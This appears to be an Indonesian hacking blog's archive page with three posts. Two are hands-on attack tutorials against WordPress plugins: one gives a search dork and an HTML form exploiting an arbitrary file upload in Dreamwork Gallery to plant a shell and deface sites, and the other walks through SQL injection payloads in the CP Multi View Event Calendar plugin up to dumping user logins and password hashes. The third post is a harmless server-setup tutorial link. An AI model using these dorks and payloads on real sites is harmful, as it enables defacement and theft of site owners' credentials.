Tampilkan postingan dengan label CMS Wordpress. Tampilkan semua postingan
Tampilkan postingan dengan label CMS Wordpress. Tampilkan semua postingan

Kamis, 06 April 2017

eXploit Dreamwork Gallery File Upload Vulnerability


Hello World; Soree Fans, Please Say Hello Haters ;*
apa Kabs ? Lanjut Blogwalking Om. akwkwa, maap2 lagi sibuk nulis ebook sama nulis SFTH, sembari donlod2 JAV uncensored sih :v #aanjaey xD awkkwa
seduh kopi dulu biar sans kale xD , okei kali ini Gue Bakal Share salah satu eXploit yang ada pada CMS WordPress.
ini merupakan salah satu Bug/Celah yang ada pada CMS berlogo W Biru >..< *suka2aingmhanx*

Yupz kali ini gue bakal Share Tutorial Deface Website BerCMS WordPress dengan eXploit Dreamwork Gallery File Upload Vulnerability .
Gua gak tau persis ye ini eXploit baru atau Lawas, soalnya gua muter2 barat ampe timur gak nemu yg bisa di sodok make Shell :3 udh Bypass ekstensi masih gagal.
kalo mao liat yang berhasil upload Shell cek di Source ya :) , karena utk kali ini gua cuma Upload Script dipesan saja :')

Lanjut intip tutorial


Dork :
inurl:/wp-content/plugins/wp-dreamworkgallery/
(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Masukin ke Script Uploader dibawah

3. Copy Script dibawah:

<form action="www.target.c0li/[path]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>

*ganti target.c0li dengan target yg pen lu tusbol
*[path] = sesuaikan dgn target lu, ye kalo gak ada pathnya langsung masukin aja eXploitnya
*save dengan ekstensi .html = contoh.html

4. Masukin Shell/File yang pengen Lu Upload

kek yg tadi gua bilang, gua upload script dipesan langsung

5. nah langsung Muncul deh Letak Shell/File yang tadi udeh lu upload.
tinggal lu cek aja


#BooM~

Shell/File Akses: /wp-content/uploads/dreamwork/randomangka_uploadfolder/big/namafilelu
dah ye, simpel kan ? intinye pinter2 lu Dorking dan eksekusi aja hehhe.
lanjutin deh, lu eXplore dewek nih eXploit & Bug (y) , moga membantu lu ye . ya minimal buat Refrensi aja awkkwaka xD

owh iya, Bila ada Link atau gambar pada Artikel Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: xhac.kerr

./Nuenomaru


Lo Hebat soal Mencari Celah, tapi Maaf Attitude masih Lemah





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Selasa, 31 Januari 2017

[UKOM] Tutorial Membuat DNS & Web Server di Linux UBUNTU, dan SSH REMOTE with winscp

Hello World ; Siang Fans, Please Say Hello Haters ;*
gimana kabar Lu o.O ? iya elu .-. , baik2 aja kan :)) bruakakakakk

hmm, karena ini udh memasuki persiapan Ujian Praktek utk SMK, kali ini gua bakal ReShare Video Tutorial dari Bang Initial.N ..
tadinya gua mao biarin aja si Initial.N yang posting artikel kali ini, tapi dia lagi sibuk banget wkwkw, ampe ora bisa di contact :\ *kemanasihkamoehmz

artikel ini bakal ngeReview Ujian Praktek TKJ Tahun kemarin >..< ( jujur gua lupa ini Ukom TKJ Paket berapa >3< *maafkan, tuhan menciptakan manusia ganteng dengan kekurangannya , yaitu pelupa :p )

yang Jelas gua gak tau apakah ini Materi Praktek bakal dipakai Untuk tahun2 Selanjutnya '3')/
yang jelas semoga Video Tutorial dari Bang Initial.N ini bermanfaat dan menambah wawasan/refrensi kalean adek2 TeKaJeh / para pemula penggiat IT :)


silahkan cek Tutornya di Youtube -> Tutorial Membuat DNS & Web Server di Linux UBUNTU, dan SSH REMOTE with winscp [VB]

Created & edited By: Init.N
Tutorial Membuat DNS & Web Server (Instalasi CMS Wordpress dan membuat Database) di Linux UBUNTU, dan SSH REMOTE with winscp.
maaf kalo tutornya cupuu 
enjoyed bro

*note: ini video Latihan sebelom UKOM, makanye masih di konfig di VirtualBox, kalo yang aselinya mah kita bener2 install full CLI di PC Server ^_^




Baca juga yaw :
Instalasi dan Konfigurasi WebMail di Debian 7
Tutorial Membuat DNS, DHCP, dan HTTP Server pada Cisco Packet Tracer
Cara Membuat Virtual Host (SubDomain) di Linux

Nantikan juga Video2 Tutorial di Channel baru kami: BadSector Channel

Jangan Lupa Like , Comment , and Subscribe br0~
Semoga bermanfaat ^_^

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Keep Share ~
Sekian dan semoga bermanfaat .. terimakasih

Greetz: Initial.N

./Nuenomaru


sange kok gak modal -3xBitCh





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Minggu, 29 Januari 2017

WordPress Plugin CP Multi View Event Calendar SQL Injection

Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial WordPress Plugin CP Multi View Event Calendar  SQL Injection.
yoii kali ini kita maen suntik2an di CMS WordPress, maaf baru update, adminnya lagi pada sibuk maen ML akwkwak.



Dork : inurl:/wp-content/plugins/cp-multi-view-calendar
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

eXploit: 127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=<sql>

hackbar : disini saya menggunakan hackbar buatan sec7or, silahkan di download di sini

1. pertama silahkan cari target yang ingin di eksekusi, jika sudah menemukan target, coba dimasukan exploitnya hingga tampilan menjadi seperti berikut


2. setelah itu kita coba test urlnya dengan untuk mengecek error apa tidak
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1


3. jika terjadi blank kemungkinan bisa di exploitasi dengan sql injection, coba kita balance dulu dengan +--+ 
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1+--+

jika halaman tidak blank lagi, berarti balancenya bisa.
4. Sekarang kita coba hitung jumlah table yang ada dengan order by
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 1--+


5. jika seperti gambar diatas, kita coba order by lagi

127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 1--+ →no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 2--+ → no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 3--+ → no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 10--+ → no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 15--+ → error

gotcha, error juga akwkwa
6. karna saat kita order by 15 terjadi eror, dan di coba order by 14 tidak error,berarti jumlah table nya adalah 14.

sekarang kita coba cari angka ajaibnya dengan menggunakan union select
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+


7. nah angka ajaibnya adalah 5,6 dan 10

sekarang kita exploitasi menggunakan DIOS nya mas madblood
contoh :
http://127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=-1 union select 1,2,3,4,concat(0x696e6a6563742062792033786269746368),6,7,8,9,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),11,12,13,14--+


8. dan boom~
Sekarang kita tinggal cari table usernya.
Jika sudah ketemu kita dump deh

contoh :
http://127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=-1 union select 1,2,3,4,concat(0x696e6a6563742062792033786269746368),6,7,8,9,group_concat(user_login,0x3a,user_pass),11,12,13,14+from+wp_final_users--+


nah muncul kan tuh?
abis  ini seterah ente mau diapain, Baca juga Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

Like, Comment, and Subscribe Channel Baru Kami: BadSector Channel

Oke sekian tutorial cupu dari saya :)

3xBitCh






Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i
 

ande ande lumoet Template by Ipietoon Cute Blog Design